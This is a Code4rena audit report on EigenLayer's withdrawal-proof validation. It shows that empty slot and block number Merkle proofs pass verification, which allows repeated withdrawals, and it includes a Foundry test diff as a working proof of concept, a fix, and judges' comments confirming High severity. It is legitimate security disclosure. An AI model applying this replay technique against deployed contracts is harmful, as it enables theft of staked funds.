code-423n4 / 2023-04-eigenlayer-findings

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Slot and block number proofs not required for verification of withdrawal (multiple withdrawals possible) #388

Open code423n4 opened 1 year ago

code423n4 commented 1 year ago

Lines of code

Vulnerability details


Since this is a vulnerability which involves multiple in-scope contracts and leads to more than one impact, let's start with a bug desciption from bottom to top.

Library Merkle

The methods verifyInclusionSha256(proof, root, leaf, index) and verifyInclusionKeccak(proof, root, leaf, index) will always return true if proof.lenght < 32 (e.g. empty proof) and leaf == root. Although this might be intended behaviour, I see no use case for empty proofs and would require non-empty proofs at library level. As of now, the user of the library is responsible to enforce non-zero proofs.

Library BeaconChainProofs

The method verifyWithdrawalProofs(beaconStateRoot, proofs, withdrawalFields), which relies on multiple calls to Merkle.verifyInclusionSha256(proof, root, leaf, index), does not require a minimum length of proofs.slotProof and proofs.blockNumberProof. As a consequence, considering a valid set of (beaconStateRoot, proofs, withdrawalFields), the method will still succeed with empty slot and block number proofs, i.e. the proofs can be modified in the following way:

proofs.slotProof = bytes("");             // empty slot proof
proofs.slotRoot = proofs.blockHeaderRoot; // make leaf == root

proofs.blockNumberProof = bytes("");                  // empty block number proof
proofs.blockNumberRoot = proofs.executionPayloadRoot; // make leaf == root

As a consequence, we can take a perfectly valid withdrawal proof and re-create the proof for the same withdrawal with a different slot and block number (according to the code above) that will still be accepted by the verifyWithdrawalProofs(beaconStateRoot, proofs, withdrawalFields) method.

Contract EigenPod

The method verifyAndProcessWithdrawal(withdrawalProofs, ...), which relies on a call to BeaconChainProofs.verifyWithdrawalProofs(beaconStateRoot, proofs, withdrawalFields), is impacted by a modified - but still valid - withdrawal proof in two ways.

First, the modifier proofIsForValidBlockNumber(Endian.fromLittleEndianUint64(withdrawalProofs.blockNumberRoot)) makes sure that the block number being proven is greater/newer than the mostRecentWithdrawalBlockNumber. In our case, blockNumberRoot = executionPayloadRoot and depending on the actual value of executionPayloadRoot, the proofIsForValidBlockNumber can be bypassed as shown in the test, see any PoC test case. As a consquence, old withdrawal proofs could be re-used with an empty blockNumberProof to withdraw the same funds more than once.

Second, the sub-method _processPartialWithdrawal(withdrawalHappenedSlot, ...) requires that a slot is only used once. In our case, slotRoot = blockHeaderRoot which leads to a different slot than suggested by the original proof, therefore a withdrawal proof can be re-used with an empty slotProof to do the same partial withdrawal twice, see PoC.
Depending on the actual value of blockHeaderRoot, a full withdrawal instead of a partial withdrawal will be done according to the condition in L354.

Impact summary

Insufficient validation of proofs allows multiple withdrawals, i.e. theft of funds.

Proof of Concept

The changes to the EigenPod test cases below demonstrate the following outcomes:
testFullWithdrawalProof: BeaconChainProofs.verifyWithdrawalProofs(beaconStateRoot, proofs, withdrawalFields) still succeeds on empty slot and block number proofs.
testFullWithdrawalFlow: EigenPod.verifyAndProcessWithdrawal(withdrawalProofs, ...) allows full withdrawal with empty slot and block number proofs.
testPartialWithdrawalFlow: EigenPod.verifyAndProcessWithdrawal(withdrawalProofs, ...) allows partial withdrawal with empty slot and block number proofs.
testProvingMultipleWithdrawalsForSameSlot: EigenPod.verifyAndProcessWithdrawal(withdrawalProofs, ...) allows partial withdrawal of the same funds twice due to different slotRoot in original and modified proof.
The proofIsForValidBlockNumber(Endian.fromLittleEndianUint64(withdrawalProofs.blockNumberRoot)) modifier is bypassed (see blockNumberRoot) in the latter three of the above test cases.

Apply the following diff to your src/test/EigenPod.t.sol and run the tests with forge test --match-contract EigenPod:

diff --git a/src/test/EigenPod.t.sol b/src/test/EigenPod.t.sol
index 31e6a58..5242def 100644
--- a/src/test/EigenPod.t.sol
+++ b/src/test/EigenPod.t.sol
@@ -260,7 +260,7 @@ contract EigenPodTests is ProofParsing, EigenPodPausingConstants {

     function testFullWithdrawalProof() public {
-        BeaconChainProofs.WithdrawalProofs memory proofs = _getWithdrawalProof();
+        BeaconChainProofs.WithdrawalProofs memory proofs = _getWithdrawalProof(SKIP_SLOT_BLOCK_PROOF);
         withdrawalFields = getWithdrawalFields();
         validatorFields = getValidatorFields();

@@ -281,7 +281,7 @@ contract EigenPodTests is ProofParsing, EigenPodPausingConstants {

         // ./solidityProofGen "WithdrawalFieldsProof" 61336 2262 "data/slot_43222/oracle_capella_beacon_state_43300.ssz" "data/slot_43222/capella_block_header_43222.json" "data/slot_43222/capella_block_43222.json" fullWithdrawalProof.json
-        BeaconChainProofs.WithdrawalProofs memory withdrawalProofs = _getWithdrawalProof();
+        BeaconChainProofs.WithdrawalProofs memory withdrawalProofs = _getWithdrawalProof(SKIP_SLOT_BLOCK_PROOF);
         bytes memory validatorFieldsProof = abi.encodePacked(getValidatorProof());
         withdrawalFields = getWithdrawalFields();
         validatorFields = getValidatorFields();
@@ -317,7 +317,7 @@ contract EigenPodTests is ProofParsing, EigenPodPausingConstants {
         //generate partialWithdrawalProofs.json with:
         // ./solidityProofGen "WithdrawalFieldsProof" 61068 656 "data/slot_58000/oracle_capella_beacon_state_58100.ssz" "data/slot_58000/capella_block_header_58000.json" "data/slot_58000/capella_block_58000.json" "partialWithdrawalProof.json"
-        BeaconChainProofs.WithdrawalProofs memory withdrawalProofs = _getWithdrawalProof();
+        BeaconChainProofs.WithdrawalProofs memory withdrawalProofs = _getWithdrawalProof(SKIP_SLOT_BLOCK_PROOF);
         bytes memory validatorFieldsProof = abi.encodePacked(getValidatorProof());

         withdrawalFields = getWithdrawalFields();
@@ -346,21 +346,22 @@ contract EigenPodTests is ProofParsing, EigenPodPausingConstants {

     /// @notice verifies that multiple partial withdrawals can be made before a full withdrawal
     function testProvingMultipleWithdrawalsForSameSlot(/*uint256 numPartialWithdrawals*/) public {
-        IEigenPod newPod = testPartialWithdrawalFlow();
+        IEigenPod newPod = testPartialWithdrawalFlow(); // uses SKIP_SLOT_BLOCK_PROOF

-        BeaconChainProofs.WithdrawalProofs memory withdrawalProofs = _getWithdrawalProof();
+        BeaconChainProofs.WithdrawalProofs memory withdrawalProofs = _getWithdrawalProof(FULL_PROOF);
         bytes memory validatorFieldsProof = abi.encodePacked(getValidatorProof());
         withdrawalFields = getWithdrawalFields();
         validatorFields = getValidatorFields();

-        cheats.expectRevert(bytes("EigenPod._processPartialWithdrawal: partial withdrawal has already been proven for this slot"));
+        // do not expect revert anymore due to different 'slotRoot' on FULL_PROOF and SKIP_SLOT_BLOCK_PROOF
+        //cheats.expectRevert(bytes("EigenPod._processPartialWithdrawal: partial withdrawal has already been proven for this slot"));
         newPod.verifyAndProcessWithdrawal(withdrawalProofs, validatorFieldsProof, validatorFields, withdrawalFields, 0, 0);

     /// @notice verifies that multiple full withdrawals for a single validator fail
     function testDoubleFullWithdrawal() public {
-        IEigenPod newPod = testFullWithdrawalFlow();
-        BeaconChainProofs.WithdrawalProofs memory withdrawalProofs = _getWithdrawalProof();
+        IEigenPod newPod = testFullWithdrawalFlow(); // uses SKIP_SLOT_BLOCK_PROOF
+        BeaconChainProofs.WithdrawalProofs memory withdrawalProofs = _getWithdrawalProof(FULL_PROOF);
         bytes memory validatorFieldsProof = abi.encodePacked(getValidatorProof());
         withdrawalFields = getWithdrawalFields();
         validatorFields = getValidatorFields();
@@ -759,8 +760,11 @@ contract EigenPodTests is ProofParsing, EigenPodPausingConstants {
         return proofs;

+    uint256 internal constant FULL_PROOF = 0;
+    uint256 internal constant SKIP_SLOT_BLOCK_PROOF = 1;
     /// @notice this function just generates a valid proof so that we can test other functionalities of the withdrawal flow
-    function _getWithdrawalProof() internal returns(BeaconChainProofs.WithdrawalProofs memory) {
+    function _getWithdrawalProof(uint256 proofType) internal returns(BeaconChainProofs.WithdrawalProofs memory) {
         //make initial deposit
         eigenPodManager.stake{value: stakeAmount}(pubkey, signature, depositDataRoot);
@@ -773,9 +777,9 @@ contract EigenPodTests is ProofParsing, EigenPodPausingConstants {
             bytes32 blockHeaderRoot = getBlockHeaderRoot();
             bytes32 blockBodyRoot = getBlockBodyRoot();
-            bytes32 slotRoot = getSlotRoot();
-            bytes32 blockNumberRoot = getBlockNumberRoot();
+            bytes32 slotRoot = (proofType == FULL_PROOF) ? getSlotRoot() : blockHeaderRoot; // else SKIP_SLOT_BLOCK_PROOF
             bytes32 executionPayloadRoot = getExecutionPayloadRoot();
+            bytes32 blockNumberRoot = (proofType == FULL_PROOF) ? getBlockNumberRoot() :  executionPayloadRoot; // else SKIP_SLOT_BLOCK_PROOF

@@ -786,9 +790,9 @@ contract EigenPodTests is ProofParsing, EigenPodPausingConstants {
             BeaconChainProofs.WithdrawalProofs memory proofs = BeaconChainProofs.WithdrawalProofs(
-                abi.encodePacked(getSlotProof()),
+                (proofType == FULL_PROOF) ? abi.encodePacked(getSlotProof()) : bytes(""), // else SKIP_SLOT_BLOCK_PROOF
-                abi.encodePacked(getBlockNumberProof()),
+                (proofType == FULL_PROOF) ? abi.encodePacked(getBlockNumberProof()) : bytes(""), // else SKIP_SLOT_BLOCK_PROOF

We can see that all the test cases are still passing, whereby the following ones are confirming the aforementioned outcomes:

[PASS] testFullWithdrawalFlow():(address) (gas: 28517915)
[PASS] testFullWithdrawalProof() (gas: 13185538)
[PASS] testPartialWithdrawalFlow():(address) (gas: 28679149)
[PASS] testProvingMultipleWithdrawalsForSameSlot() (gas: 45502286)

Tools Used

VS Code, Foundry

Recommended Mitigation Steps

Require a minimum length (tree height) for the slot and block number proofs in BeaconChainProofs.verifyWithdrawalProofs(beaconStateRoot, proofs, withdrawalFields).
At least require non-empty proofs according to the follwing diff:

diff --git a/src/contracts/libraries/BeaconChainProofs.sol b/src/contracts/libraries/BeaconChainProofs.sol
index b4129bf..119baf2 100644
--- a/src/contracts/libraries/BeaconChainProofs.sol
+++ b/src/contracts/libraries/BeaconChainProofs.sol
@@ -259,6 +259,10 @@ library BeaconChainProofs {
             "BeaconChainProofs.verifyWithdrawalProofs: withdrawalProof has incorrect length");
         require(proofs.executionPayloadProof.length == 32 * (BEACON_BLOCK_HEADER_FIELD_TREE_HEIGHT + BEACON_BLOCK_BODY_FIELD_TREE_HEIGHT),
             "BeaconChainProofs.verifyWithdrawalProofs: executionPayloadProof has incorrect length");
+        require(proofs.slotProof.length >= 32,
+            "BeaconChainProofs.verifyWithdrawalProofs: slotProof has incorrect length");
+        require(proofs.blockNumberProof.length >= 32,
+            "BeaconChainProofs.verifyWithdrawalProofs: blockNumberProof has incorrect length");

          * Computes the block_header_index relative to the beaconStateRoot.  It concatenates the indexes of all the

Alternative: Non-empty proofs can also be required in the Merkle library.

Assessed type

Invalid Validation

0xSorryNotSorry commented 1 year ago

Well demonstrated with referrable code snippets, hyperlinks and coded POC. Marking as HQ.

c4-pre-sort commented 1 year ago

0xSorryNotSorry marked the issue as high quality report

c4-pre-sort commented 1 year ago

0xSorryNotSorry marked the issue as primary issue

c4-sponsor commented 1 year ago

Sidu28 marked the issue as sponsor confirmed

GalloDaSballo commented 1 year ago

The Warden has shown how, due to a lack of length check, an empty proof could be provided, which would pass validation

This is an example of how a lack of a check can be chained into a proper exploit, and because the proof will pass, funds can be stolen

For these reasons I agree with High Severity

c4-judge commented 1 year ago

GalloDaSballo marked the issue as selected for report